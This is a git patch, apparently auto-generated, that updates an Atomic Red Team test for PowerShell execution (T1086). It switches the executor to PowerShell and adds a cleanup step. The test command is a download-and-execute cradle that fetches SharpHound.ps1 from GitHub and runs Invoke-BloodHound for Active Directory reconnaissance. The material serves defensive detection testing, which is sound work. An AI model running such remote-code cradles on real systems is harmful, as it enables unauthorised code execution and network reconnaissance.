From 2ad2ad0ffd81f0f0db4ba77bccacd0e88235e5ee Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Fri, 27 Mar 2020 20:02:20 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1086/T1086.md | 10 +++++++---
 atomics/index.yaml     |  9 ++++++---
 2 files changed, 13 insertions(+), 6 deletions(-)

diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index 4bfaefce..02991e30 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -88,13 +88,17 @@ and then compress and store the data to the temp directory on the machine
 | bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
 
 
-#### Attack Commands: Run with `command_prompt`! 
+#### Attack Commands: Run with `powershell`! 
 
 
-```cmd
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
+```powershell
+IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
 ```
 
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:temp\*BloodHound.zip -Force
+```
 
 
 
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 1ffa7c8e..ee01cf3d 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -23068,10 +23068,13 @@ execution:
           type: url
           default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
       executor:
-        name: command_prompt
+        name: powershell
         elevation_required: false
-        command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
-          Invoke-BloodHound"
+        command: 'IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
+          Invoke-BloodHound
+
+'
+        cleanup_command: 'Remove-Item $env:temp\*BloodHound.zip -Force
 
 '
     - name: Obfuscation Tests